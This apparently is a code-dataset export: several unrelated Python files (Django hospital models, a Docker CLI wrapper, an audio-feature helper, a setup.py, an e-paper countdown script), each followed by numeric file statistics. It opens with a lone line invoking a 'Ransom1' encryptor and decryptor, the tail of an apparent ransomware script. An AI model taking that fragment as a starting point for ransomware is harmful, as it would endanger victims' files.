Ransom1.Encryptor(startpath) Ransom1.Decryptor(startpath)
33.287356
103
0.564917
324
2,896
4.932099
0.342593
0.055069
0.042553
0.022528
0.397998
0.397998
0.397998
0.216521
0.216521
0.1602
0
0.02551
0.323204
2,896
87
104
33.287356
0.789796
0.044199
0
0.333333
0
0
0.034795
0
0
0
0
0
0
1
0.083333
false
0.033333
0.083333
0
0.183333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c7bf5865a56e3f581e75a1fa2f6a01c3109a4
4,756
py
Python
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
9
2019-05-19T14:00:03.000Z
2019-05-21T14:19:56.000Z
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
8
2019-05-20T12:29:08.000Z
2022-02-10T11:06:55.000Z
hospital/models.py
mohitkyadav/calldoc
ebdcdcfac346e995c44cbf94a3c87c25ba594ee1
[ "MIT" ]
1
2019-05-20T07:04:20.000Z
2019-05-20T07:04:20.000Z
import uuid from django.contrib.auth.models import User from django.db import models from django.urls import reverse from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from landing.models import Profile class Specialisation(models.Model): class Meta: ordering = ('id',) verbose_name = 'specialisation' verbose_name_plural = 'specialisations' id = models.CharField(unique=True, default=uuid.uuid4, editable=False, max_length=50, primary_key=True) name = models.CharField(max_length=50) def __str__(self): return self.name class Hospital(models.Model): class Meta: ordering = ('-rating',) verbose_name = 'Hospital' verbose_name_plural = 'Hospitals' user = models.OneToOneField(User, on_delete=models.CASCADE) name = models.CharField(max_length=1000, null=True, blank=True) address = models.TextField(max_length=5000, null=True, blank=True) slug = models.SlugField(unique=True, null=True, blank=True) rating = models.PositiveSmallIntegerField(default=3, validators=[ MaxValueValidator(5), MinValueValidator(1), ]) phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format:" " '+919999999999'.") email = models.EmailField(blank=True, help_text="Please enter valid email address, it will be used for " "verification.") phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True, help_text="Please enter " "valid phone " "number.") specialisation = models.ManyToManyField(Specialisation, related_name='speciality_of_hospital') verified = models.BooleanField(default=False) def __str__(self): return self.user.first_name def get_url(self): return reverse('hospital:overview', args=[self.slug]) def get_all_spec(self): specs = "" for spec in self.specialisation.all(): specs += spec.name + ", " return specs[:-2] class Doctor(models.Model): class Meta: ordering = ('name',) verbose_name = 'Doctor' verbose_name_plural = 'Doctors' user = models.OneToOneField(User, on_delete=models.CASCADE) name = models.CharField(max_length=1000, null=True, blank=True) address = models.TextField(max_length=5000, null=True, blank=True) slug = models.SlugField(unique=True, null=True, blank=True) rating = models.PositiveSmallIntegerField(default=3, validators=[ MaxValueValidator(5), MinValueValidator(1), ]) hospital = models.ForeignKey(Hospital, related_name='doctor', on_delete=models.CASCADE) specialisation = models.ManyToManyField(Specialisation, related_name='speciality') def __str__(self): return self.name def get_url(self): return reverse('hospital:doctor-home', args=[self.slug]) def get_all_spec(self): specs = "" for spec in self.specialisation.all(): specs += spec.name + ", " return specs[:-2] class Appointment(models.Model): class Meta: ordering = ('-start_date',) verbose_name = 'Appointment' verbose_name_plural = 'Appointments' id = models.CharField(unique=True, default=uuid.uuid4, editable=False, max_length=50, primary_key=True) doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True) patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True) start_date = models.DateTimeField(blank=True, null=True, help_text="You can choose dates from now") end_date = models.DateTimeField(blank=True, null=True, help_text="You can choose appointment " "duration as maximum of 7 days") patients_remarks = models.TextField(blank=True, null=True) doctors_remarks = models.TextField(blank=True, null=True) approved = models.BooleanField(default=False) rejected = models.BooleanField(default=False) rejection_cause = models.TextField(max_length=20000, blank=True, null=True) def __str__(self): return str(self.doctor.name + "-" + self.patient.user.first_name) def get_start_date(self): return self.start_date.date() def get_end_date(self): return self.end_date.date()
39.305785
114
0.625526
518
4,756
5.596525
0.258687
0.035874
0.028976
0.035185
0.595033
0.5188
0.483615
0.38565
0.359434
0.359434
0
0.016157
0.271236
4,756
120
115
39.633333
0.820254
0
0
0.43299
0
0
0.093566
0.004626
0
0
0
0
0
1
0.103093
false
0
0.061856
0.082474
0.649485
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413d8e7168ec81d7fbf240777114a40652b16b3b
409
py
Python
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
anno-search-crawler/checker.py
powerslider/anno-search
b47ae5b4077d75622e088d3064e61934a8a3cf37
[ "Apache-2.0" ]
null
null
null
import os import json json_files = set() errors = set() dir = "extracted/json/" for file in os.listdir(dir): if ".json" in file: json_files.add(file) with open(dir + file, "r") as f: j = json.loads("".join(f.read())) if j["entities"] == {} or j["text"] == "": errors.add(file) print(errors or "All good. Scanned files: " + str(len(json_files)))
22.722222
67
0.545232
59
409
3.728814
0.542373
0.122727
0
0
0
0
0
0
0
0
0
0
0.278729
409
17
68
24.058824
0.745763
0
0
0
0
0
0.141809
0
0
0
0
0
0
1
0
false
0
0.153846
0
0.153846
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413ea01cee609cb192107f94528569476162e9b2
29,112
py
Python
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
2
2017-06-20T15:20:46.000Z
2019-11-18T01:28:49.000Z
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
null
null
null
labpack/platforms/docker.py
collectiveacuity/labPack
c8fb0d1ee23608f6dbcb99c232373eee886000fd
[ "MIT" ]
null
null
null
__author__ = 'rcj1492' __created__ = '2016.03' __license__ = 'MIT' from labpack.handlers.requests import requestsHandler class dockerClient(requestsHandler): _class_fields = { 'schema': { 'virtualbox_name': '', 'container_alias': '', 'image_name': '', 'image_tag': '', 'image_id': '', 'sys_command': '', 'environmental_variables': {}, 'envvar_key': '', 'envvar_value': '', 'mapped_ports': {}, 'port_key': '1000', 'port_value': '1000', 'mounted_volumes': {}, 'mount_field': '', 'start_command': '', 'network_name': '', 'run_flags': '' }, 'components': { '.envvar_key': { 'must_contain': [ '^[a-zA-Z_][a-zA-Z0-9_]+$' ], 'max_length': 255 }, '.envvar_value': { 'max_length': 32767 }, '.port_key': { 'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ] }, '.port_value': { 'contains_either': [ '\d{2,5}', '\d{2,5}\-\d{2,5}' ] } } } def __init__(self, virtualbox_name='', verbose=False): ''' a method to initialize the dockerClient class :param virtualbox_name: [optional] string with name of virtualbox image :return: dockerClient object ''' title = '%s.__init__' % self.__class__.__name__ # construct super super(dockerClient, self).__init__() # construct fields model from jsonmodel.validators import jsonModel self.fields = jsonModel(self._class_fields) # validate inputs input_fields = { 'virtualbox_name': virtualbox_name } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # construct properties self.vbox = virtualbox_name self.verbose = verbose # construct localhost from labpack.platforms.localhost import localhostClient self.localhost = localhostClient() # verbosity if self.verbose: print('Checking docker installation...', end='', flush=True) # validate docker installation self._validate_install() if self.verbose: print('.', end='', flush=True) # validate virtualbox installation self.vbox_running = self._validate_virtualbox() if self.verbose: print('.', end='', flush=True) # set virtualbox variables if self.vbox_running: self._set_virtualbox() if self.verbose: print('.', end='', flush=True) if self.verbose: print(' done.') def _validate_install(self): ''' a method to validate docker is installed ''' from subprocess import check_output, STDOUT sys_command = 'docker --help' try: check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') # call(sys_command, stdout=open(devnull, 'wb')) except Exception as err: raise Exception('"docker" not installed. GoTo: https://www.docker.com') return True def _validate_virtualbox(self): ''' a method to validate that virtualbox is running on Win 7/8 machines :return: boolean indicating whether virtualbox is running ''' # validate operating system if self.localhost.os.sysname != 'Windows': return False win_release = float(self.localhost.os.release) if win_release >= 10.0: return False # validate docker-machine installation from os import devnull from subprocess import call, check_output, STDOUT sys_command = 'docker-machine --help' try: check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') except Exception as err: raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com') # validate virtualbox is running sys_command = 'docker-machine status %s' % self.vbox try: vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '') except Exception as err: if not self.vbox: raise Exception('Docker requires VirtualBox to run on Win7/8. GoTo: https://www.virtualbox.org') elif self.vbox == "default": raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.') else: raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox) if 'Stopped' in vbox_status: raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox)) return True def _set_virtualbox(self): ''' a method to set virtualbox environment variables for docker-machine :return: True ''' from os import environ if not environ.get('DOCKER_CERT_PATH'): import re sys_command = 'docker-machine env %s' % self.vbox cmd_output = self.command(sys_command) variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME'] for variable in variable_list: env_start = '%s="' % variable env_end = '"\\n' env_regex = '%s.*?%s' % (env_start, env_end) env_pattern = re.compile(env_regex) env_statement = env_pattern.findall(cmd_output) env_var = env_statement[0].replace(env_start, '').replace('"\n', '') environ[variable] = env_var return True def _images(self, sys_output): ''' a helper method for parsing docker image output ''' import re gap_pattern = re.compile('\t|\s{2,}') image_list = [] output_lines = sys_output.split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) if len(columns) == len(column_headers): image_details = {} for j in range(len(columns)): image_details[column_headers[j]] = columns[j] image_list.append(image_details) return image_list def _ps(self, sys_output): ''' a helper method for parsing docker ps output ''' import re gap_pattern = re.compile('\t|\s{2,}') container_list = [] output_lines = sys_output.split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) container_details = {} if len(columns) > 1: for j in range(len(column_headers)): container_details[column_headers[j]] = '' if j <= len(columns) - 1: container_details[column_headers[j]] = columns[j] # stupid hack for possible empty port column if container_details['PORTS'] and not container_details['NAMES']: from copy import deepcopy container_details['NAMES'] = deepcopy(container_details['PORTS']) container_details['PORTS'] = '' container_list.append(container_details) return container_list def _synopsis(self, container_settings, container_status=''): ''' a helper method for summarizing container settings ''' # compose default response settings = { 'container_status': container_settings['State']['Status'], 'container_exit': container_settings['State']['ExitCode'], 'container_ip': container_settings['NetworkSettings']['IPAddress'], 'image_name': container_settings['Config']['Image'], 'container_alias': container_settings['Name'].replace('/',''), 'container_variables': {}, 'mapped_ports': {}, 'mounted_volumes': {}, 'container_networks': [] } # parse fields nested in container settings import re num_pattern = re.compile('\d+') if container_settings['NetworkSettings']['Ports']: for key, value in container_settings['NetworkSettings']['Ports'].items(): if value: port = num_pattern.findall(value[0]['HostPort'])[0] settings['mapped_ports'][port] = num_pattern.findall(key)[0] elif container_settings['HostConfig']['PortBindings']: for key, value in container_settings['HostConfig']['PortBindings'].items(): port = num_pattern.findall(value[0]['HostPort'])[0] settings['mapped_ports'][port] = num_pattern.findall(key)[0] if container_settings['Config']['Env']: for variable in container_settings['Config']['Env']: k, v = variable.split('=') settings['container_variables'][k] = v for volume in container_settings['Mounts']: system_path = volume['Source'] container_path = volume['Destination'] settings['mounted_volumes'][system_path] = container_path if container_settings['NetworkSettings']: if container_settings['NetworkSettings']['Networks']: for key in container_settings['NetworkSettings']['Networks'].keys(): settings['container_networks'].append(key) # determine stopped status if settings['container_status'] == 'exited': if not container_status: try: from subprocess import check_output, STDOUT sys_command = 'docker logs --tail 1 %s' % settings['container_alias'] check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') settings['container_status'] = 'stopped' except: pass else: settings['container_status'] = container_status return settings def images(self): ''' a method to list the local docker images :return: list of dictionaries with available image fields [ { 'CREATED': '7 days ago', 'TAG': 'latest', 'IMAGE ID': '2298fbaac143', 'VIRTUAL SIZE': '302.7 MB', 'REPOSITORY': 'test1' } ] ''' sys_command = 'docker images' sys_output = self.command(sys_command) image_list = self._images(sys_output) return image_list def ps(self): ''' a method to list the local active docker containers :return: list of dictionaries with active container fields [{ 'CREATED': '6 minutes ago', 'NAMES': 'flask', 'PORTS': '0.0.0.0:5000->5000/tcp', 'CONTAINER ID': '38eb0bbeb2e5', 'STATUS': 'Up 6 minutes', 'COMMAND': '"gunicorn --chdir ser"', 'IMAGE': 'rc42/flaskserver' }] ''' sys_command = 'docker ps -a' sys_output = self.command(sys_command) container_list = self._ps(sys_output) return container_list def network_ls(self): ''' a method to list the available networks :return: list of dictionaries with docker network fields [{ 'NETWORK ID': '3007476acfe5', 'NAME': 'bridge', 'DRIVER': 'bridge', 'SCOPE': 'local' }] ''' import re gap_pattern = re.compile('\t|\s{2,}') network_list = [] sys_command = 'docker network ls' output_lines = self.command(sys_command).split('\n') column_headers = gap_pattern.split(output_lines[0]) for i in range(1,len(output_lines)): columns = gap_pattern.split(output_lines[i]) network_details = {} if len(columns) > 1: for j in range(len(column_headers)): network_details[column_headers[j]] = '' if j <= len(columns) - 1: network_details[column_headers[j]] = columns[j] network_list.append(network_details) return network_list def inspect_container(self, container_alias): ''' a method to retrieve the settings of a container :param container_alias: string with name or id of container :return: dictionary of settings of container { TOO MANY TO LIST } ''' title = '%s.inspect_container' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # send inspect command import json sys_command = 'docker inspect %s' % container_alias output_dict = json.loads(self.command(sys_command)) container_settings = output_dict[0] return container_settings def inspect_image(self, image_name, image_tag=''): ''' a method to retrieve the settings of an image :param image_name: string with name or id of image :param image_tag: [optional] string with tag associated with image :return: dictionary of settings of image { TOO MANY TO LIST } ''' title = '%s.inspect_image' % self.__class__.__name__ # validate inputs input_fields = { 'image_name': image_name, 'image_tag': image_tag } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # determine system command argument sys_arg = image_name if image_tag: sys_arg += ':%s' % image_tag # run inspect command import json sys_command = 'docker inspect %s' % sys_arg output_dict = json.loads(self.command(sys_command)) image_settings = output_dict[0] return image_settings def rm(self, container_alias): ''' a method to remove an active container :param container_alias: string with name or id of container :return: string with container id ''' title = '%s.rm' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # run remove command sys_cmd = 'docker rm -f %s' % container_alias output_lines = self.command(sys_cmd).split('\n') return output_lines[0] def rmi(self, image_id): ''' a method to remove an image :param image_name: string with id of image :return: list of strings with image layers removed ''' title = '%s.rmi' % self.__class__.__name__ # validate inputs input_fields = { 'image_id': image_id } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # send remove command sys_cmd = 'docker rmi %s' % image_id output_lines = self.command(sys_cmd).split('\n') return output_lines def ip(self): ''' a method to retrieve the ip of system running docker :return: string with ip address of system ''' if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10: sys_cmd = 'docker-machine ip %s' % self.vbox system_ip = self.command(sys_cmd).replace('\n','') else: system_ip = self.localhost.ip return system_ip def search(self, image_name): # run docker search sys_command = 'docker search %s' % image_name shell_output = self._handle_command(sys_command) # parse table from labpack.parsing.shell import convert_table image_list = convert_table(shell_output) return image_list def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'): # construct sys command arguments from os import path tag_insert = '' if image_tag: tag_insert = ':%s' % image_tag path_root, path_node = path.split(dockerfile_path) sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root) # determine verbosity print_pipe = False if self.verbose: print_pipe = True else: sys_command += ' -q' # run command shell_output = self._handle_command(sys_command, print_pipe=print_pipe) return shell_output def save(self, image_name, file_name, image_tag=''): sys_command = 'docker save -o %s %s' % (file_name, image_name) if image_tag: sys_command += ':%s' % image_tag return self.command(sys_command) def command(self, sys_command): ''' a method to run a system command in a separate shell :param sys_command: string with docker command :return: string output from docker ''' title = '%s.command' % self.__class__.__name__ # validate inputs input_fields = { 'sys_command': sys_command } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) from subprocess import check_output, STDOUT, CalledProcessError try: output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8') except CalledProcessError as err: raise Exception(err.output.decode('ascii', 'ignore')) return output def synopsis(self, container_alias): ''' a method to summarize key configuration settings required for docker compose :param container_alias: string with name or id of container :return: dictionary with values required for module configurations ''' title = '%s.synopsis' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # retrieve container settings container_settings = self.inspect_container(container_alias) # summarize settings settings = self._synopsis(container_settings) return settings def enter(self, container_alias): ''' a method to open up a terminal inside a running container :param container_alias: string with name or id of container :return: None ''' title = '%s.enter' % self.__class__.__name__ # validate inputs input_fields = { 'container_alias': container_alias } for key, value in input_fields.items(): object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # compose system command from os import system sys_cmd = 'docker exec -it %s sh' % container_alias if self.localhost.os.sysname in ('Windows'): sys_cmd = 'winpty %s' % sys_cmd # open up terminal system(sys_cmd) def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''): ''' a method to start a local container :param image_name: string with name or id of image :param container_alias: string with name to assign to container :param image_tag: [optional] string with tag assigned to image :param environmental_variables: [optional] dictionary of envvar fields to add to container :param mapped_ports: [optional] dictionary of port fields to map to container :param mounted_volumes: [optional] dictionary of path fields to map to container :param start_command: [optional] string of command (and any arguments) to run inside container :param network_name: [optional] string with name of docker network to link container to :param run_flags: [optional] string with additional docker options to add to container :return: string with container id NOTE: valid characters for environmental variables key names follow the shell standard of upper and lower alphanumerics or underscore and cannot start with a numerical value. NOTE: ports are mapped such that the key name is the system port and the value is the port inside the container. both must be strings of digits. NOTE: volumes are mapped such that the key name is the absolute or relative system path and the value is the absolute path inside the container. both must be strings. NOTE: additional docker options: --entrypoint overrides existing entrypoint command --rm removes container once start command exits --log-driver sets system logging settings for the container https://docs.docker.com/engine/reference/run ''' title = '%s.run' % self.__class__.__name__ # validate inputs input_fields = { 'image_name': image_name, 'container_alias': container_alias, 'image_tag': image_tag, 'environmental_variables': environmental_variables, 'mapped_ports': mapped_ports, 'mounted_volumes': mounted_volumes, 'start_command': start_command, 'network_name': network_name, 'run_flags': run_flags } for key, value in input_fields.items(): if value: object_title = '%s(%s=%s)' % (title, key, str(value)) self.fields.validate(value, '.%s' % key, object_title) # validate subfields if environmental_variables: for key, value in environmental_variables.items(): key_title = '%s(environmental_variables={%s:...})' % (title, key) self.fields.validate(key, '.envvar_key', key_title) value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.envvar_value', value_title) else: environmental_variables = {} if mapped_ports: for key, value in mapped_ports.items(): key_title = '%s(mapped_ports={%s:...})' % (title, key) self.fields.validate(key, '.port_key', key_title) value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.port_value', value_title) else: mapped_ports = {} if mounted_volumes: for key, value in mounted_volumes.items(): key_title = '%s(mounted_volumes={%s:...})' % (title, key) self.fields.validate(key, '.mount_field', key_title) value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value)) self.fields.validate(value, '.mount_field', value_title) else: mounted_volumes = {} # TODO verify image exists (locally or remotely) ??? # verify alias does not exist for container in self.ps(): if container['NAMES'] == container_alias: raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias)) # verify network exists network_exists = False for network in self.network_ls(): if network['NAME'] == network_name: network_exists = True if network_name and not network_exists: raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name)) # verify system paths and compose absolute path mount map absolute_mounts = {} from os import path for key, value in mounted_volumes.items(): if not path.exists(key): raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' % (title, key)) absolute_path = path.abspath(key) if self.localhost.os.sysname == 'Windows': absolute_path = '"/%s"' % absolute_path else: absolute_path = '"%s"' % absolute_path absolute_mounts[absolute_path] = '"%s"' % value # compose run command sys_cmd = 'docker run --name %s' % container_alias for key, value in environmental_variables.items(): sys_cmd += ' -e %s=%s' % (key.upper(), value) for key, value in mapped_ports.items(): sys_cmd += ' -p %s:%s' % (key, value) for key, value in absolute_mounts.items(): sys_cmd += ' -v %s:%s' % (key, value) if network_name: sys_cmd += ' --network %s' % network_name if run_flags: sys_cmd += ' %s' % run_flags.strip() sys_cmd += ' -d %s' % image_name if image_tag: sys_cmd += ':%s' % image_tag if start_command: sys_cmd += ' %s' % start_command.strip() # run run command output_lines = self.command(sys_cmd).split('\n') return output_lines[0] if __name__ == '__main__': # test docker client init from pprint import pprint docker_client = dockerClient() # test docker list methods images = docker_client.images() print(images) containers = docker_client.ps() print(containers) networks = docker_client.network_ls() print(networks) remote_images = docker_client.search('alpine') print(remote_images) # # test docker run # from labpack.records.settings import load_settings # docker_config = load_settings('../../data/test_docker.yaml') # container_id = docker_client.run( # image_name=docker_config['image_name'], # container_alias=docker_config['container_alias'], # environmental_variables=docker_config['envvar'], # mounted_volumes=docker_config['mounts'], # mapped_ports=docker_config['ports'], # start_command=docker_config['command'] # ) # print(container_id) # # # wait for container to start # from time import sleep # sleep(1) # test docker synopsis for container in containers: settings = docker_client.synopsis(container['CONTAINER ID']) pprint(settings) # test enter and rm from separate script print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
36.897338
182
0.561384
3,145
29,112
4.991097
0.128458
0.022934
0.012614
0.014907
0.401988
0.342804
0.288781
0.228069
0.212079
0.183411
0
0.006401
0.33457
29,112
788
183
36.944162
0.803892
0.208505
0
0.327354
0
0.002242
0.146633
0.016376
0
0
0
0.001269
0
1
0.049327
false
0.002242
0.049327
0
0.152466
0.033632
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413f75cca22078b8921f0960e0731176326021d4
947
py
Python
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
classical_models/util_functions.py
leejaeka/sound_classifier
121bc11522514ed45e5ad74c4c3ffdb0e87cd688
[ "Apache-2.0" ]
null
null
null
import numpy as np import pandas as pd def load_data(dataset='training', path='../data_processed/'): return pd.read_pickle(path + dataset + '_set.pkl') def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'): df = load_data(dataset=dataset, path=path) labels, files, column_values = [],[],[] for index, row in df.iterrows(): for f in range(row['mfccs'].shape[1]): labels.append(row['Label']) files.append(index) column_values.append(row['mfccs'][:,f]) df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values }) #Here we make the lists inside the target column into independent columns, while keeping the file_id and label features_df = pd.concat([df['column_values'].apply(pd.Series), df['File_id'], df['Label']], axis = 1) features_df = features_df.set_index('File_id') return features_df
37.88
114
0.669483
134
947
4.552239
0.432836
0.098361
0.04918
0.07541
0.104918
0
0
0
0
0
0
0.002571
0.178458
947
24
115
39.458333
0.781491
0.1151
0
0
0
0
0.16368
0
0
0
0
0
0
1
0.125
false
0
0.125
0.0625
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414012d7a8b9a151ce80cbbbd219f43643543cf6
1,395
py
Python
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
2
2017-12-02T12:14:10.000Z
2020-09-30T17:49:37.000Z
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
null
null
null
setup.py
chembl/chembl_assay_matrix
f8f48e2fd22cde19f0bc6da3052e94952a5d7df3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- __author__ = 'mnowotka' import sys try: from setuptools import setup except ImportError: from ez_setup import use_setuptools use_setuptools() from setuptools import setup if sys.version_info < (2, 7, 3) or sys.version_info >= (2, 7, 7): raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7') setup( name='chembl-assay-network', version='0.8.1', author='Michal Nowotka', author_email='mnowotka@ebi.ac.uk', description='Python package generating compound co-occurance matrix for all assays from given document', url='https://www.ebi.ac.uk/chembldb/index.php/ws', license='CC BY-SA 3.0', packages=['chembl_assay_network'], long_description=open('README.rst').read(), install_requires=[ 'chembl-core-model>=0.8.3', 'numpy>=1.7.1', 'scipy', ], include_package_data=True, classifiers=['Development Status :: 2 - Pre-Alpha', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: POSIX :: Linux', 'Programming Language :: Python :: 2.7', 'Topic :: Scientific/Engineering :: Chemistry'], zip_safe=False, )
32.44186
108
0.614337
168
1,395
5
0.642857
0.011905
0.047619
0.059524
0.038095
0
0
0
0
0
0
0.025739
0.248029
1,395
43
109
32.44186
0.775024
0.030108
0
0.055556
0
0
0.451923
0.034024
0
0
0
0
0
1
0
false
0
0.138889
0
0.138889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41402626baceb0ad14ef7bcb1114108515c7b502
2,029
py
Python
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
6
2019-10-07T12:03:45.000Z
2019-10-10T11:41:57.000Z
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
null
null
null
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
null
null
null
#!/usr/bin/env python3 # ISC License # # Copyright (c) 2019, Andrea Giammarchi, @WebReflection # # Permission to use, copy, modify, and/or distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH # REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY # AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, # INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM # LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE # OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR # PERFORMANCE OF THIS SOFTWARE. import random import os import sys sys.path.insert(1, os.path.realpath('./node_modules/filebus/python')) # initialize the display from waveshare_epd import epd2in13 epaper = epd2in13.EPD() # they defined width and height upside down ^_^;; width=epaper.height height=epaper.width # initialize the "canvas" from PIL import Image, ImageFont, ImageDraw # initialize the font from font_fredoka_one import FredokaOne font = ImageFont.truetype(FredokaOne, 42) # initiate the FileBus channel from filebus import FileBus def ready(value = None): print('ready') epaper.init(epaper.lut_full_update) epaper.Clear(0xFF) epaper.init(epaper.lut_partial_update) fb.send('ready', random.random()) def update(message = ''): print('update: ' + message); w, h = font.getsize(message) x = (width - w) / 2 y = (height - h) / 2 img = Image.new("P", (width, height), 255) draw = ImageDraw.Draw(img) draw.text((x, y), message, font = font, fill = 0) epaper.display(epaper.getbuffer(img.rotate(180))) fb.send('update', random.random()) # use .js as channel input, and .python as channel output fb = FileBus('.js', '.python') fb.on('ready', ready) fb.on('update', update) # just wait for JS handshake
30.283582
79
0.73928
300
2,029
4.97
0.51
0.024145
0.021462
0.025486
0
0
0
0
0
0
0
0.014035
0.15722
2,029
66
80
30.742424
0.857895
0.497782
0
0
0
0
0.075301
0.029116
0
0
0.004016
0
0
1
0.064516
false
0
0.225806
0
0.290323
0.064516
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
